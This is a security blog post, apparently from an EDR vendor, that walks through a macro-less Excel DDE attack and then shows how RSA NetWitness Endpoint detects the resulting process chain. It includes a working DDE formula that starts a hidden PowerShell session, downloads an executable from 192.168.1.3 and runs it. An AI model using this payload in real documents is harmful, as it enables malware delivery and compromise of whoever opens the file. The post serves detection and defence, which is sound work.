There has recently been a reappearance of a method used to execute commands via malicious Excel files (and other office documents) without the need of Macros.
The method uses Dynamic Data Exchange (DDE), and what makes it interesting is that, even though it does causes prompt messages to appear, it doesn’t use Macros and therefore it is less likely to be detected and blocked, and users are more likely to accept the prompts. In addition, as this is a “feature” and not a vulnerability, it is not something that will be patched, and cannot be easily prevented and blocked.
We will see how to perform a sample attack using DDE and then how easily it can be detected with RSA NetWitness Endpoint.
DDE Sample Attack
To execute a command using DDE, all we have to do is create an Excel file and use the following formula in one of the cells:
=cmd|’ /c notepad’!A0
Once the user opens the file and accepts the prompts, notepad.exe will be launched.
To make the attack more interesting, we want to use the same method in conjunction with PowerShell to download and execute our payload (the payload “YGH.exe” is hosted on the “192.168.1.3” server):
=cmd|’/c powershell.exe -w hidden (New-Object System.Net.WebClient).DownloadFile(\”http://192.168.1.3/YGH.exe\”,\”c:\\Users\Public\\YGH.exe\”);Start-Process \”c:\\Users\\Public\\YGH.exe\”‘!A0
Once the victim opens the file, this is what he sees:
After accepting the 1st warning message, he sees a 2nd warning:
And finally the payload gets downloaded and executed:
In a real life scenario, the malware would have done something more stealthy, or provided remote access to the attacker instead of displaying a message.
Detection Using RSA NetWitness Endpoint (EDR)
Now, from the RSA NetWitness Endpoint view, this would be detected very easily.
- IIOCs are triggered for Office running PowerShell and PowerShell downloading content. This could be used to generate real-time alerts via email and/or Syslog and get notified at an early stage of the attack.
- Excel is executed
- Excel launches “cmd.exe”. From the command arguments we can see that cmd is used to launch powershell to download and execute a file called “YGH.exe” from the “192.168.1.3” server.
- PowerShell saves the YGH.exe file to disk
- PowerShell executed the YGH.exe file
This shows how an attack vector that can easily bypass traditional preventive solutions can be detected by RSA NetWitness Endpoint based on the monitored behavior of the user’s workstation.
This has been detected even though Excel is an approved software with a valid trusted signature and the malware itself didn’t perform any malicious activity (it only shows a message to the victim). It demonstrates early detection capabilities based on behavior before negative impact actually happens.